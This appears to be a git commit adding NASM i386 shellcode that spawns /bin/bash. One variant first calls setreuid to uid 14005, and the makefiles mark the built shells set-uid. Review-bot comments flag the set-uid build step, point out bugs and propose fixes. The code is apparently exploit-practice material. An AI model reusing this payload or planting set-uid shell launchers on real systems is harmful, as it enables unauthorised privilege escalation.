new file: exec_cmd/makefile

new file:   exec_cmd/shell
	new file:   exec_cmd/shell.asm
	new file:   exec_cmd/shell.o
	new file:   exec_cmd_setuid/makefile
	new file:   exec_cmd_setuid/shell
	new file:   exec_cmd_setuid/shell.asm
	new file:   exec_cmd_setuid/shell.o
Brett Weiland 2020-11-20 17:57:20 -06:00
commit 0c7b4ed751
8 changed files with 57 additions and 0 deletions

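--- a/exec_cmd/makefile
+++ b/exec_cmd/makefile
@@ -0,0 +1,5 @@
+make:
+nasm shell.asm -felf32 -o shell.o
+ld -m elf_i386 shell.o -o shell -s
+chmod u+s shell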
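Review bot: The only target, `make`, ends with `chmod u+s shell`, so every build leaves a set-uid program that launches `/bin/bash` in the working tree, and the commit also checks in the built `shell` and `shell.o`, which cannot be reviewed as source. If the build is ever run as root, or the file's owner is later changed, that is a privileged shell launcher sitting on disk. The set-uid step belongs in a separate, explicitly named target (for example `lab-setuid:`) with a comment that it is for an isolated lab VM only, alongside a `clean` target and an ignore rule for the build artifacts. exec_cmd_setuid/makefile is identical and needs the same change.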

exec_cmd/shell Executable file

Binary file not shown.

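--- a/exec_cmd/shell.asm
+++ b/exec_cmd/shell.asm
@@ -0,0 +1,19 @@
+global _start
+_start:
+jmp short data
+exploit:
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+pop edx
+mov [edx + 10], eax
+mov al, 11
+mov ebx, edx
+xor edx, edx
+int 0x80
+data:
+call exploit
+cmd: db '/bin/bash'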
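Review bot: The store `mov [edx + 10], eax` writes four zero bytes starting one byte past where a terminator for the nine-byte `cmd` string would go, and `cmd` is declared without a trailing zero, so the path handed to `int 0x80` is not reliably NUL-terminated. With no `section` directive NASM places everything in `.text`, which the makefile's `ld` invocation presumably maps read-only, so the standalone binary is likely to fault on that store. For a standalone build, declaring the string as `cmd: db '/bin/bash', 0` in a data section removes the need for the run-time store. A header comment naming the target (Linux i386, `int 0x80`, call 11 = execve) and the role of each register would also help readers; the same store appears in exec_cmd_setuid/shell.asm.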

exec_cmd/shell.o Normal file

Binary file not shown.

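--- a/exec_cmd_setuid/makefile
+++ b/exec_cmd_setuid/makefile
@@ -0,0 +1,5 @@
+make:
+nasm shell.asm -felf32 -o shell.o
+ld -m elf_i386 shell.o -o shell -s
+chmod u+s shell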

exec_cmd_setuid/shell Executable file

Binary file not shown.

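--- a/exec_cmd_setuid/shell.asm
+++ b/exec_cmd_setuid/shell.asm
@@ -0,0 +1,28 @@
+global _start
+_start:
+jmp short data
+exploit:
+xor edx, edx
+xor eax, eax ; set reuid
+xor ebx, ebx
+xor ecx, ecx
+mov al, 203
+mov bx, 14005
+mov cx, 14005
+int 0x80
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+pop edx
+mov [edx + 10], eax
+mov al, 11
+mov ebx, cmd
+int 0x80
+data:
+call exploit ; this puts the address of where we're at (where the string is!) in the stack and jmps to start
+cmd: db '/bin/bash'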
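Review bot: The result of the first `int 0x80` (call 203, commented "set reuid") is discarded by the following `xor eax, eax`, so the program goes on to start `/bin/bash` whether or not the identity change took effect; a `test eax, eax` / `jnz` to an exit path right after the call would make a failure visible. The id 14005 is a bare literal loaded twice and would read better as a named constant (`TARGET_UID equ 14005`) with a comment saying where the value comes from. Unlike exec_cmd/shell.asm, this file leaves `edx` holding the popped string address at the second `int 0x80` and loads `ebx` from the absolute symbol `cmd`, which contradicts the comment on the `call exploit` line; the two files should set up the call the same way.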

exec_cmd_setuid/shell.o Normal file

Binary file not shown.